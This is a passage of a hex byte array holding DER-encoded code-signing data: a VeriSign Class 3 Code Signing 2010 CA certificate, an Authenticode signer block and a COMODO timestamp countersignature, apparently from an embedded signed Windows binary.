0x4E, 0x65, 0x74, 0x77, 0x6F, 0x72, 0x6B, 0x31, 0x3A, 0x30, 0x38, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x31, 0x28, 0x63, 0x29, 0x20, 0x32, 0x30, 0x30, 0x36, 0x20, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x20, 0x2D, 0x20, 0x46, 0x6F, 0x72, 0x20, 0x61, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x7A, 0x65, 0x64, 0x20, 0x75, 0x73, 0x65, 0x20, 0x6F, 0x6E, 0x6C, 0x79, 0x31, 0x45, 0x30, 0x43, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x3C, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x50, 0x75, 0x62, 0x6C, 0x69, 0x63, 0x20, 0x50, 0x72, 0x69, 0x6D, 0x61, 0x72, 0x79, 0x20, 0x43, 0x65, 0x72, 0x74, 0x69, 0x66, 0x69, 0x63, 0x61, 0x74, 0x69, 0x6F, 0x6E, 0x20, 0x41, 0x75, 0x74, 0x68, 0x6F, 0x72, 0x69, 0x74, 0x79, 0x20, 0x2D, 0x20, 0x47, 0x35, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x30, 0x30, 0x32, 0x30, 0x38, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x17, 0x0D, 0x32, 0x30, 0x30, 0x32, 0x30, 0x37, 0x32, 0x33, 0x35, 0x39, 0x35, 0x39, 0x5A, 0x30, 0x81, 0xB4, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x1F, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x16, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 0x4E, 0x65, 0x74, 0x77, 0x6F, 0x72, 0x6B, 0x31, 0x3B, 0x30, 0x39, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x32, 0x54, 0x65, 0x72, 0x6D, 0x73, 0x20, 0x6F, 0x66, 0x20, 0x75, 0x73, 0x65, 0x20, 0x61, 0x74, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x72, 0x70, 0x61, 0x20, 0x28, 0x63, 0x29, 0x31, 0x30, 0x31, 0x2E, 0x30, 0x2C, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x25, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x32, 0x30, 0x31, 0x30, 0x20, 0x43, 0x41, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xF5, 0x23, 0x4B, 0x5E, 0xA5, 0xD7, 0x8A, 0xBB, 0x32, 0xE9, 0xD4, 0x57, 0xF7, 0xEF, 0xE4, 0xC7, 0x26, 0x7E, 0xAD, 0x19, 0x98, 0xFE, 0xA8, 0x9D, 0x7D, 0x94, 0xF6, 0x36, 0x6B, 0x10, 0xD7, 0x75, 0x81, 0x30, 0x7F, 0x04, 0x68, 0x7F, 0xCB, 0x2B, 0x75, 0x1E, 0xCD, 0x1D, 0x08, 0x8C, 0xDF, 0x69, 0x94, 0xA7, 0x37, 0xA3, 0x9C, 0x7B, 0x80, 0xE0, 0x99, 0xE1, 0xEE, 0x37, 0x4D, 0x5F, 0xCE, 0x3B, 0x14, 0xEE, 0x86, 0xD4, 0xD0, 0xF5, 0x27, 0x35, 0xBC, 0x25, 0x0B, 0x38, 0xA7, 0x8C, 0x63, 0x9D, 0x17, 0xA3, 0x08, 0xA5, 0xAB, 0xB0, 0xFB, 0xCD, 0x6A, 0x62, 0x82, 0x4C, 0xD5, 0x21, 0xDA, 0x1B, 0xD9, 0xF1, 0xE3, 0x84, 0x3B, 0x8A, 0x2A, 0x4F, 0x85, 0x5B, 0x90, 0x01, 0x4F, 0xC9, 0xA7, 0x76, 0x10, 0x7F, 0x27, 0x03, 0x7C, 0xBE, 0xAE, 0x7E, 0x7D, 0xC1, 0xDD, 0xF9, 0x05, 0xBC, 0x1B, 0x48, 0x9C, 0x69, 0xE7, 0xC0, 0xA4, 0x3C, 0x3C, 0x41, 0x00, 0x3E, 0xDF, 0x96, 0xE5, 0xC5, 0xE4, 0x94, 0x71, 0xD6, 0x55, 0x01, 0xC7, 0x00, 0x26, 0x4A, 0x40, 0x3C, 0xB5, 0xA1, 0x26, 0xA9, 0x0C, 0xA7, 0x6D, 0x80, 0x8E, 0x90, 0x25, 0x7B, 0xCF, 0xBF, 0x3F, 0x1C, 0xEB, 0x2F, 0x96, 0xFA, 0xE5, 0x87, 0x77, 0xC6, 0xB5, 0x56, 0xB2, 0x7A, 0x3B, 0x54, 0x30, 0x53, 0x1B, 0xDF, 0x62, 0x34, 0xFF, 0x1E, 0xD1, 0xF4, 0x5A, 0x93, 0x28, 0x85, 0xE5, 0x4C, 0x17, 0x4E, 0x7E, 0x5B, 0xFD, 0xA4, 0x93, 0x99, 0x7F, 0xDF, 0xCD, 0xEF, 0xA4, 0x75, 0xEF, 0xEF, 0x15, 0xF6, 0x47, 0xE7, 0xF8, 0x19, 0x72, 0xD8, 0x2E, 0x34, 0x1A, 0xA6, 0xB4, 0xA7, 0x4C, 0x7E, 0xBD, 0xBB, 0x4F, 0x0C, 0x3D, 0x57, 0xF1, 0x30, 0xD6, 0xA6, 0x36, 0x8E, 0xD6, 0x80, 0x76, 0xD7, 0x19, 0x2E, 0xA5, 0xCD, 0x7E, 0x34, 0x2D, 0x89, 0x02, 0x03, 0x01, 0x00, 0x01, 0xA3, 0x82, 0x01, 0xFE, 0x30, 0x82, 0x01, 0xFA, 0x30, 0x12, 0x06, 0x03, 0x55, 0x1D, 0x13, 0x01, 0x01, 0xFF, 0x04, 0x08, 0x30, 0x06, 0x01, 0x01, 0xFF, 0x02, 0x01, 0x00, 0x30, 0x70, 0x06, 0x03, 0x55, 0x1D, 0x20, 0x04, 0x69, 0x30, 0x67, 0x30, 0x65, 0x06, 0x0B, 0x60, 0x86, 0x48, 0x01, 0x86, 0xF8, 0x45, 0x01, 0x07, 0x17, 0x03, 0x30, 0x56, 0x30, 0x28, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x01, 0x16, 0x1C, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x63, 0x70, 0x73, 0x30, 0x2A, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x02, 0x02, 0x30, 0x1E, 0x1A, 0x1C, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x72, 0x70, 0x61, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x1D, 0x0F, 0x01, 0x01, 0xFF, 0x04, 0x04, 0x03, 0x02, 0x01, 0x06, 0x30, 0x6D, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x0C, 0x04, 0x61, 0x30, 0x5F, 0xA1, 0x5D, 0xA0, 0x5B, 0x30, 0x59, 0x30, 0x57, 0x30, 0x55, 0x16, 0x09, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x2F, 0x67, 0x69, 0x66, 0x30, 0x21, 0x30, 0x1F, 0x30, 0x07, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x04, 0x14, 0x8F, 0xE5, 0xD3, 0x1A, 0x86, 0xAC, 0x8D, 0x8E, 0x6B, 0xC3, 0xCF, 0x80, 0x6A, 0xD4, 0x48, 0x18, 0x2C, 0x7B, 0x19, 0x2E, 0x30, 0x25, 0x16, 0x23, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6C, 0x6F, 0x67, 0x6F, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x76, 0x73, 0x6C, 0x6F, 0x67, 0x6F, 0x2E, 0x67, 0x69, 0x66, 0x30, 0x34, 0x06, 0x03, 0x55, 0x1D, 0x1F, 0x04, 0x2D, 0x30, 0x2B, 0x30, 0x29, 0xA0, 0x27, 0xA0, 0x25, 0x86, 0x23, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x63, 0x72, 0x6C, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x70, 0x63, 0x61, 0x33, 0x2D, 0x67, 0x35, 0x2E, 0x63, 0x72, 0x6C, 0x30, 0x34, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x01, 0x01, 0x04, 0x28, 0x30, 0x26, 0x30, 0x24, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x30, 0x01, 0x86, 0x18, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x6F, 0x63, 0x73, 0x70, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x25, 0x04, 0x16, 0x30, 0x14, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x02, 0x06, 0x08, 0x2B, 0x06, 0x01, 0x05, 0x05, 0x07, 0x03, 0x03, 0x30, 0x28, 0x06, 0x03, 0x55, 0x1D, 0x11, 0x04, 0x21, 0x30, 0x1F, 0xA4, 0x1D, 0x30, 0x1B, 0x31, 0x19, 0x30, 0x17, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x10, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x4D, 0x50, 0x4B, 0x49, 0x2D, 0x32, 0x2D, 0x38, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x1D, 0x0E, 0x04, 0x16, 0x04, 0x14, 0xCF, 0x99, 0xA9, 0xEA, 0x7B, 0x26, 0xF4, 0x4B, 0xC9, 0x8E, 0x8F, 0xD7, 0xF0, 0x05, 0x26, 0xEF, 0xE3, 0xD2, 0xA7, 0x9D, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x1D, 0x23, 0x04, 0x18, 0x30, 0x16, 0x80, 0x14, 0x7F, 0xD3, 0x65, 0xA7, 0xC2, 0xDD, 0xEC, 0xBB, 0xF0, 0x30, 0x09, 0xF3, 0x43, 0x39, 0xFA, 0x02, 0xAF, 0x33, 0x31, 0x33, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x03, 0x82, 0x01, 0x01, 0x00, 0x56, 0x22, 0xE6, 0x34, 0xA4, 0xC4, 0x61, 0xCB, 0x48, 0xB9, 0x01, 0xAD, 0x56, 0xA8, 0x64, 0x0F, 0xD9, 0x8C, 0x91, 0xC4, 0xBB, 0xCC, 0x0C, 0xE5, 0xAD, 0x7A, 0xA0, 0x22, 0x7F, 0xDF, 0x47, 0x38, 0x4A, 0x2D, 0x6C, 0xD1, 0x7F, 0x71, 0x1A, 0x7C, 0xEC, 0x70, 0xA9, 0xB1, 0xF0, 0x4F, 0xE4, 0x0F, 0x0C, 0x53, 0xFA, 0x15, 0x5E, 0xFE, 0x74, 0x98, 0x49, 0x24, 0x85, 0x81, 0x26, 0x1C, 0x91, 0x14, 0x47, 0xB0, 0x4C, 0x63, 0x8C, 0xBB, 0xA1, 0x34, 0xD4, 0xC6, 0x45, 0xE8, 0x0D, 0x85, 0x26, 0x73, 0x03, 0xD0, 0xA9, 0x8C, 0x64, 0x6D, 0xDC, 0x71, 0x92, 0xE6, 0x45, 0x05, 0x60, 0x15, 0x59, 0x51, 0x39, 0xFC, 0x58, 0x14, 0x6B, 0xFE, 0xD4, 0xA4, 0xED, 0x79, 0x6B, 0x08, 0x0C, 0x41, 0x72, 0xE7, 0x37, 0x22, 0x06, 0x09, 0xBE, 0x23, 0xE9, 0x3F, 0x44, 0x9A, 0x1E, 0xE9, 0x61, 0x9D, 0xCC, 0xB1, 0x90, 0x5C, 0xFC, 0x3D, 0xD2, 0x8D, 0xAC, 0x42, 0x3D, 0x65, 0x36, 0xD4, 0xB4, 0x3D, 0x40, 0x28, 0x8F, 0x9B, 0x10, 0xCF, 0x23, 0x26, 0xCC, 0x4B, 0x20, 0xCB, 0x90, 0x1F, 0x5D, 0x8C, 0x4C, 0x34, 0xCA, 0x3C, 0xD8, 0xE5, 0x37, 0xD6, 0x6F, 0xA5, 0x20, 0xBD, 0x34, 0xEB, 0x26, 0xD9, 0xAE, 0x0D, 0xE7, 0xC5, 0x9A, 0xF7, 0xA1, 0xB4, 0x21, 0x91, 0x33, 0x6F, 0x86, 0xE8, 0x58, 0xBB, 0x25, 0x7C, 0x74, 0x0E, 0x58, 0xFE, 0x75, 0x1B, 0x63, 0x3F, 0xCE, 0x31, 0x7C, 0x9B, 0x8F, 0x1B, 0x96, 0x9E, 0xC5, 0x53, 0x76, 0x84, 0x5B, 0x9C, 0xAD, 0x91, 0xFA, 0xAC, 0xED, 0x93, 0xBA, 0x5D, 0xC8, 0x21, 0x53, 0xC2, 0x82, 0x53, 0x63, 0xAF, 0x12, 0x0D, 0x50, 0x87, 0x11, 0x1B, 0x3D, 0x54, 0x52, 0x96, 0x8A, 0x2C, 0x9C, 0x3D, 0x92, 0x1A, 0x08, 0x9A, 0x05, 0x2E, 0xC7, 0x93, 0xA5, 0x48, 0x91, 0xD3, 0x31, 0x82, 0x4B, 0xAB, 0x30, 0x82, 0x4B, 0xA7, 0x02, 0x01, 0x01, 0x30, 0x81, 0xC9, 0x30, 0x81, 0xB4, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x0E, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x2C, 0x20, 0x49, 0x6E, 0x63, 0x2E, 0x31, 0x1F, 0x30, 0x1D, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x16, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x54, 0x72, 0x75, 0x73, 0x74, 0x20, 0x4E, 0x65, 0x74, 0x77, 0x6F, 0x72, 0x6B, 0x31, 0x3B, 0x30, 0x39, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x32, 0x54, 0x65, 0x72, 0x6D, 0x73, 0x20, 0x6F, 0x66, 0x20, 0x75, 0x73, 0x65, 0x20, 0x61, 0x74, 0x20, 0x68, 0x74, 0x74, 0x70, 0x73, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x76, 0x65, 0x72, 0x69, 0x73, 0x69, 0x67, 0x6E, 0x2E, 0x63, 0x6F, 0x6D, 0x2F, 0x72, 0x70, 0x61, 0x20, 0x28, 0x63, 0x29, 0x31, 0x30, 0x31, 0x2E, 0x30, 0x2C, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x25, 0x56, 0x65, 0x72, 0x69, 0x53, 0x69, 0x67, 0x6E, 0x20, 0x43, 0x6C, 0x61, 0x73, 0x73, 0x20, 0x33, 0x20, 0x43, 0x6F, 0x64, 0x65, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x69, 0x6E, 0x67, 0x20, 0x32, 0x30, 0x31, 0x30, 0x20, 0x43, 0x41, 0x02, 0x10, 0x2D, 0x80, 0x21, 0xD8, 0x4F, 0x09, 0x8E, 0x7A, 0xBD, 0xE1, 0x99, 0xF8, 0x18, 0xE2, 0x11, 0xA4, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0xA0, 0x70, 0x30, 0x10, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0C, 0x31, 0x02, 0x30, 0x00, 0x30, 0x19, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x03, 0x31, 0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x04, 0x30, 0x1C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x0B, 0x31, 0x0E, 0x30, 0x0C, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x02, 0x01, 0x15, 0x30, 0x23, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x04, 0x31, 0x16, 0x04, 0x14, 0x50, 0x30, 0x7C, 0xCD, 0xA0, 0x6F, 0x99, 0x6E, 0xF9, 0x78, 0x41, 0xB7, 0x09, 0x46, 0xBF, 0x27, 0xAC, 0x28, 0x6B, 0x11, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x04, 0x82, 0x01, 0x00, 0x31, 0x14, 0x6E, 0x0D, 0x0E, 0xC6, 0x99, 0x98, 0x8B, 0xAC, 0xE3, 0xB2, 0x7C, 0xF1, 0xFA, 0x8B, 0xAF, 0xFA, 0x86, 0x18, 0x55, 0xC5, 0x0E, 0xA7, 0x42, 0x58, 0x73, 0xA0, 0xBA, 0xB5, 0x0C, 0xB0, 0x32, 0x4E, 0x45, 0xE3, 0x19, 0xBF, 0x42, 0x5C, 0x50, 0x14, 0x0E, 0xAA, 0x98, 0xBF, 0xBD, 0xB9, 0xC3, 0x96, 0xE6, 0x64, 0x0F, 0xC7, 0xE7, 0x15, 0x1D, 0x5D, 0x88, 0x5D, 0x10, 0x62, 0x74, 0x13, 0x03, 0xF1, 0x43, 0x30, 0x65, 0x11, 0xF2, 0xE8, 0xE4, 0xF1, 0xF2, 0x08, 0x19, 0x3D, 0xD0, 0x91, 0xD2, 0xB3, 0x1A, 0xC9, 0x9B, 0xB9, 0xD1, 0x46, 0x5B, 0x85, 0x04, 0xF1, 0x3A, 0x69, 0x0B, 0x61, 0xB5, 0xAC, 0x06, 0xA1, 0x6F, 0xE7, 0x36, 0x29, 0x92, 0x79, 0x64, 0x59, 0x31, 0x6B, 0x9F, 0x51, 0x0E, 0x48, 0x44, 0x35, 0x74, 0xE4, 0xA4, 0xA8, 0x92, 0x7F, 0x79, 0x4E, 0x5B, 0x46, 0x37, 0xF0, 0x4E, 0x35, 0xD7, 0x79, 0xEE, 0xE8, 0xDB, 0x82, 0xF2, 0x90, 0x34, 0xC7, 0x3E, 0x53, 0xB7, 0x63, 0xBF, 0x1C, 0x3A, 0xD8, 0x06, 0xB6, 0x4E, 0x26, 0x1D, 0xEB, 0x61, 0xD4, 0xCD, 0x7D, 0x69, 0x7C, 0x93, 0xF3, 0x10, 0x2D, 0x69, 0xE7, 0x6A, 0xAC, 0xEC, 0xE3, 0x41, 0x5E, 0x2E, 0x63, 0xDD, 0x86, 0x21, 0x5A, 0x92, 0xC6, 0x11, 0x7B, 0x97, 0xC3, 0x8C, 0x81, 0x11, 0x3A, 0xBD, 0x46, 0x93, 0xE7, 0x61, 0xE1, 0xC2, 0x7E, 0x97, 0xED, 0x12, 0xDF, 0xA4, 0xE6, 0x8E, 0x0A, 0x1F, 0xC6, 0x6F, 0xB9, 0xA3, 0xA5, 0x78, 0x31, 0xDB, 0x4C, 0xE6, 0xC5, 0xE0, 0x06, 0x59, 0x76, 0x5F, 0x87, 0xB4, 0x33, 0x75, 0xAF, 0xD2, 0x7C, 0x4C, 0x68, 0xA0, 0x32, 0x1A, 0xBE, 0x05, 0x62, 0xEA, 0xC4, 0x8A, 0x35, 0x74, 0x73, 0x35, 0xBD, 0x66, 0xB9, 0x10, 0x21, 0x83, 0xA6, 0xE9, 0x78, 0xB6, 0xE6, 0x19, 0x0D, 0xA1, 0x82, 0x49, 0x44, 0x30, 0x82, 0x08, 0x3B, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0x82, 0x37, 0x03, 0x03, 0x01, 0x31, 0x82, 0x08, 0x2B, 0x30, 0x82, 0x08, 0x27, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x07, 0x02, 0xA0, 0x82, 0x08, 0x18, 0x30, 0x82, 0x08, 0x14, 0x02, 0x01, 0x03, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x30, 0x81, 0xFC, 0x06, 0x0B, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x09, 0x10, 0x01, 0x04, 0xA0, 0x81, 0xEC, 0x04, 0x81, 0xE9, 0x30, 0x81, 0xE6, 0x02, 0x01, 0x01, 0x06, 0x0A, 0x2B, 0x06, 0x01, 0x04, 0x01, 0xB2, 0x31, 0x02, 0x01, 0x01, 0x30, 0x21, 0x30, 0x09, 0x06, 0x05, 0x2B, 0x0E, 0x03, 0x02, 0x1A, 0x05, 0x00, 0x04, 0x14, 0xE1, 0xEE, 0xBD, 0xD3, 0x58, 0x6C, 0x09, 0xA7, 0xE5, 0x5B, 0xE7, 0xC2, 0xC1, 0x45, 0x1E, 0xAB, 0xE8, 0x52, 0xE5, 0xBB, 0x02, 0x14, 0x15, 0xF5, 0x33, 0x34, 0x0C, 0xF4, 0xC8, 0xF6, 0x3C, 0x1E, 0x9B, 0x03, 0xE2, 0x4A, 0x3F, 0x9A, 0x98, 0xE8, 0x23, 0x7D, 0x18, 0x0F, 0x32, 0x30, 0x31, 0x36, 0x31, 0x31, 0x32, 0x32, 0x31, 0x33, 0x32, 0x33, 0x34, 0x34, 0x5A, 0xA0, 0x81, 0x8A, 0xA4, 0x81, 0x87, 0x30, 0x81, 0x84, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x47, 0x42, 0x31, 0x1B, 0x30, 0x19, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x12, 0x47, 0x72, 0x65, 0x61, 0x74, 0x65, 0x72, 0x20, 0x4D, 0x61, 0x6E, 0x63, 0x68, 0x65, 0x73, 0x74, 0x65, 0x72, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x53, 0x61, 0x6C, 0x66, 0x6F, 0x72, 0x64, 0x31, 0x1A, 0x30, 0x18, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x11, 0x43, 0x4F, 0x4D, 0x4F, 0x44, 0x4F, 0x20, 0x43, 0x41, 0x20, 0x4C, 0x69, 0x6D, 0x69, 0x74, 0x65, 0x64, 0x31, 0x2A, 0x30, 0x28, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x21, 0x43, 0x4F, 0x4D, 0x4F, 0x44, 0x4F, 0x20, 0x53, 0x48, 0x41, 0x2D, 0x31, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x20, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x65, 0x72, 0xA0, 0x82, 0x04, 0x9D, 0x30, 0x82, 0x04, 0x99, 0x30, 0x82, 0x03, 0x81, 0xA0, 0x03, 0x02, 0x01, 0x02, 0x02, 0x0F, 0x16, 0x88, 0xF0, 0x39, 0x25, 0x5E, 0x63, 0x8E, 0x69, 0x14, 0x39, 0x07, 0xE6, 0x33, 0x0B, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x05, 0x05, 0x00, 0x30, 0x81, 0x95, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x55, 0x53, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x02, 0x55, 0x54, 0x31, 0x17, 0x30, 0x15, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x0E, 0x53, 0x61, 0x6C, 0x74, 0x20, 0x4C, 0x61, 0x6B, 0x65, 0x20, 0x43, 0x69, 0x74, 0x79, 0x31, 0x1E, 0x30, 0x1C, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x15, 0x54, 0x68, 0x65, 0x20, 0x55, 0x53, 0x45, 0x52, 0x54, 0x52, 0x55, 0x53, 0x54, 0x20, 0x4E, 0x65, 0x74, 0x77, 0x6F, 0x72, 0x6B, 0x31, 0x21, 0x30, 0x1F, 0x06, 0x03, 0x55, 0x04, 0x0B, 0x13, 0x18, 0x68, 0x74, 0x74, 0x70, 0x3A, 0x2F, 0x2F, 0x77, 0x77, 0x77, 0x2E, 0x75, 0x73, 0x65, 0x72, 0x74, 0x72, 0x75, 0x73, 0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x31, 0x1D, 0x30, 0x1B, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x14, 0x55, 0x54, 0x4E, 0x2D, 0x55, 0x53, 0x45, 0x52, 0x46, 0x69, 0x72, 0x73, 0x74, 0x2D, 0x4F, 0x62, 0x6A, 0x65, 0x63, 0x74, 0x30, 0x1E, 0x17, 0x0D, 0x31, 0x35, 0x31, 0x32, 0x33, 0x31, 0x30, 0x30, 0x30, 0x30, 0x30, 0x30, 0x5A, 0x17, 0x0D, 0x31, 0x39, 0x30, 0x37, 0x30, 0x39, 0x31, 0x38, 0x34, 0x30, 0x33, 0x36, 0x5A, 0x30, 0x81, 0x84, 0x31, 0x0B, 0x30, 0x09, 0x06, 0x03, 0x55, 0x04, 0x06, 0x13, 0x02, 0x47, 0x42, 0x31, 0x1B, 0x30, 0x19, 0x06, 0x03, 0x55, 0x04, 0x08, 0x13, 0x12, 0x47, 0x72, 0x65, 0x61, 0x74, 0x65, 0x72, 0x20, 0x4D, 0x61, 0x6E, 0x63, 0x68, 0x65, 0x73, 0x74, 0x65, 0x72, 0x31, 0x10, 0x30, 0x0E, 0x06, 0x03, 0x55, 0x04, 0x07, 0x13, 0x07, 0x53, 0x61, 0x6C, 0x66, 0x6F, 0x72, 0x64, 0x31, 0x1A, 0x30, 0x18, 0x06, 0x03, 0x55, 0x04, 0x0A, 0x13, 0x11, 0x43, 0x4F, 0x4D, 0x4F, 0x44, 0x4F, 0x20, 0x43, 0x41, 0x20, 0x4C, 0x69, 0x6D, 0x69, 0x74, 0x65, 0x64, 0x31, 0x2A, 0x30, 0x28, 0x06, 0x03, 0x55, 0x04, 0x03, 0x13, 0x21, 0x43, 0x4F, 0x4D, 0x4F, 0x44, 0x4F, 0x20, 0x53, 0x48, 0x41, 0x2D, 0x31, 0x20, 0x54, 0x69, 0x6D, 0x65, 0x20, 0x53, 0x74, 0x61, 0x6D, 0x70, 0x69, 0x6E, 0x67, 0x20, 0x53, 0x69, 0x67, 0x6E, 0x65, 0x72, 0x30, 0x82, 0x01, 0x22, 0x30, 0x0D, 0x06, 0x09, 0x2A, 0x86, 0x48, 0x86, 0xF7, 0x0D, 0x01, 0x01, 0x01, 0x05, 0x00, 0x03, 0x82, 0x01, 0x0F, 0x00, 0x30, 0x82, 0x01, 0x0A, 0x02, 0x82, 0x01, 0x01, 0x00, 0xE9, 0xE9, 0x3D, 0xDF, 0xD7, 0x37, 0x08, 0xC9, 0x1E, 0x38, 0xB2, 0x52, 0x53, 0x42, 0x6D, 0x22, 0xF1, 0xB1, 0xC4, 0x06, 0x04, 0x6B, 0x9E, 0xFD, 0x82, 0x74, 0x50, 0x43, 0x7D, 0xC6, 0xA0, 0xBB, 0x1F, 0x4E, 